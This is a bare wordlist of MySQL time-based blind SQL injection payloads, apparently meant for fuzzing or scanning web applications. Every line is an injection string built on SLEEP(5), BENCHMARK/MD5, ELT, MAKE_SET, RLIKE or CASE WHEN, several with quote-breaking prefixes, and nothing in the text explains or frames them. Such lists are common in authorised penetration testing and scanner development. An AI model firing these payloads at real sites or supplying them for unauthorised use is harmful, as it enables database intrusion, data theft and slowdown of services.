' AND SLEEP(5) AND 'abracadabra'='abracadabra
AND (SELECT 1234 FROM (SELECT(SLEEP(5)))abracadabra)
OR (SELECT 1234 FROM (SELECT(SLEEP(5)))abracadabra)
AND SLEEP(5)
OR SLEEP(5)
AND 1234=BENCHMARK(5000000,MD5('abracadabra'))
OR 1234=BENCHMARK(5000000,MD5('abracadabra'))
AND 1234=BENCHMARK(5000000,MD5('abracadabra'))
OR 1234=BENCHMARK(5000000,MD5('abracadabra'))
RLIKE SLEEP(5)
RLIKE (SELECT 1234 FROM (SELECT(SLEEP(5)))abracadabra)
AND ELT(1234=1234,SLEEP(5))
OR ELT(1234=1234,SLEEP(5))
,(SELECT (CASE WHEN (1234=1234) THEN (SELECT BENCHMARK(5000000,MD5('abracadabra'))) ELSE 1234*(SELECT 1234 FROM mysql.db) END))
,(SELECT (CASE WHEN (1234=1234) THEN SLEEP(5) ELSE 1234 END))
MAKE_SET(1234=1234,SLEEP(5))
ELT(1234=1234,SLEEP(5))
(1234=1234 AND SLEEP(5))
(CASE WHEN (1234=1234) THEN (SELECT BENCHMARK(5000000,MD5('abracadabra')))
(SELECT 1234 FROM (SELECT(SLEEP(5)))abracadabra)
(CASE WHEN (1234=1234) THEN SLEEP(5) ELSE 1234 END)
PROCEDURE ANALYSE(EXTRACTVALUE(1234,CONCAT('\',(BENCHMARK(5000000,MD5('abracadabra'))))),1)
' AND (SELECT 1234 FROM (SELECT(SLEEP(5)))abracadabra) AND 'abracadabra'='abracadabra
' OR (SELECT 1234 FROM (SELECT(SLEEP(5)))abracadabra) AND 'abracadabra'='abracadabra